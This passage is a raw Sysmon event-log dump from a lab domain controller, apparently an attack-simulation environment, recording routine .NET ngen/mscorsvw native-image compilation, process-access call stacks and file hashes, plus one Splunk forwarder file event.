9\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022849Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.746{4DB9351A-A274-60D3-4805-00000000CF01}4864NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\40DHGI9GNG\Microsoft.GroupPolicy.Interop.ni.dll.auxMD5=D8E3258D361596F708E10D669366B353,SHA256=055036645E1F4DD7E91E4722FCD1D8259E1BA63B7851D0E5F02AF3804ADE23CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022848Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.746{4DB9351A-A274-60D3-4805-00000000CF01}4864NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\40DHGI9GNG\Microsoft.GroupPolicy.Interop.ni.dllMD5=FCE6632F7041F8668D2F10424D7E429B,SHA256=C12A9EA15A431F15209873E94A6971BFC3881B04EE9C9DEA9A6DE19A80BCCBB4,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022847Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.730{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A274-60D3-4805-00000000CF01}4864C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022846Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.714{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A274-60D3-4805-00000000CF01}4864C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022845Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.714{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A274-60D3-4805-00000000CF01}4864C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022844Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.714{4DB9351A-A274-60D3-4705-00000000CF01}6028NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\54Z0ODSLRJ\Microsoft.GroupPolicy.AdmTmplEditor.ni.dll.auxMD5=7FC131DB05B083463CC15B7CAB064EE9,SHA256=5A70988423CF022F8234458EEEDEBA8FE864D7E66CB3603366CB15422073FE70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022843Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.714{4DB9351A-A274-60D3-4705-00000000CF01}6028NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\54Z0ODSLRJ\Microsoft.GroupPolicy.AdmTmplEditor.ni.dllMD5=52B023CE28C92B401C5BE4EE51DBE348,SHA256=F1F3CC20B8AFA3A20DE446A5C66D0D75EE53E98B6E3DC257022D5B92D56E7AB3,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022842Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.683{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A274-60D3-4705-00000000CF01}6028C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022841Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.683{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A274-60D3-4705-00000000CF01}6028C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022840Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.683{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A274-60D3-4705-00000000CF01}6028C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022839Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.668{4DB9351A-A274-60D3-4605-00000000CF01}6928NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\RGRQ9UZQYN\Microsoft.Dtc.PowerShell.ni.dll.auxMD5=85C1F817ABEA81C6873B9CABBD03FE78,SHA256=14B972CAC10F57A51BF2CAC6FC072F6CC13941C9A6A9E705F4DF49893E577F09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022838Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.668{4DB9351A-A274-60D3-4605-00000000CF01}6928NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\RGRQ9UZQYN\Microsoft.Dtc.PowerShell.ni.dllMD5=2DB05619A5CBE0F4DAB9952A4F57F993,SHA256=1EC879F7D253717035CE8C5263781982D55F255069F0B2C527038E82F9E54052,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022837Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.652{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A274-60D3-4605-00000000CF01}6928C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022836Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.652{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A274-60D3-4605-00000000CF01}6928C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022835Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.652{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A274-60D3-4605-00000000CF01}6928C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022834Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.636{4DB9351A-A274-60D3-4505-00000000CF01}6316NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\0MCE3PICBG\Microsoft.CSharp.ni.dll.auxMD5=0B97B59E00AE0C2F725F37D2CD0789EA,SHA256=765466ECE0007E70BCDA5F1DD7B3ED67134BFD16973B9055B4D6CAC294777FA8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022833Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.636{4DB9351A-A274-60D3-4505-00000000CF01}6316NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\0MCE3PICBG\Microsoft.CSharp.ni.dllMD5=E11652503DBA109B76BB31B2F07E3BFD,SHA256=E12E8EA7480ADA2B69F2A5147FBA35E36B07983FB743B37486BF4A510AE9D23D,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022832Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.511{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A274-60D3-4505-00000000CF01}6316C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022831Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.465{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A274-60D3-4505-00000000CF01}6316C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022830Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.465{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A274-60D3-4505-00000000CF01}6316C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022829Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.465{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=68A244F5BEAE086AF35B551CEAA0E6FF,SHA256=BAAA6EADB576899788425FB44772C74FEF4E2E5049F36FE87EA289D9C3EACB1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022828Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.449{4DB9351A-A273-60D3-4405-00000000CF01}1100NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\2YPPOGVZDQ\Microsoft.CertificateServices.Setup.Interop.ni.dll.auxMD5=D1A2FD108095856AF23C50A1555247D8,SHA256=3BA8CC2121082FE3E5507A32D12E11492D2D2F6A378876359674C8E276E1CEB4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022827Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.449{4DB9351A-A273-60D3-4405-00000000CF01}1100NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\2YPPOGVZDQ\Microsoft.CertificateServices.Setup.Interop.ni.dllMD5=26239470E0E11EC9BB4DB79FA89CB904,SHA256=9FE9110DC1156D26A8261CBCC85DB5BDCB6E00D410A99EFF17364C257030349B,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022826Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:00.340{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A273-60D3-4405-00000000CF01}1100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022938Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.996{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A275-60D3-5805-00000000CF01}2212C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022937Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.996{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A275-60D3-5805-00000000CF01}2212C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022936Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.980{4DB9351A-A275-60D3-5705-00000000CF01}6120NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\HXTZXTAA93\Microsoft.PowerShell.Cmdletization.OData.ni.dll.auxMD5=82CD108AF8C1916D9AC3C8D635E1B93E,SHA256=DD768DF45F578986B3A455762BE13A419A34527F4D7AE1EE71FB4DF03981FBA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022935Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.980{4DB9351A-A275-60D3-5705-00000000CF01}6120NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\HXTZXTAA93\Microsoft.PowerShell.Cmdletization.OData.ni.dllMD5=FC62786AA1430A296343FB036ADC44FE,SHA256=B104E06B84819B4D0B9B0AC62F67A0BB9E812A0308D670A71D8B0FD9F58885A0,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022934Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.964{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A275-60D3-5705-00000000CF01}6120C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022933Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.949{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A275-60D3-5705-00000000CF01}6120C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022932Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 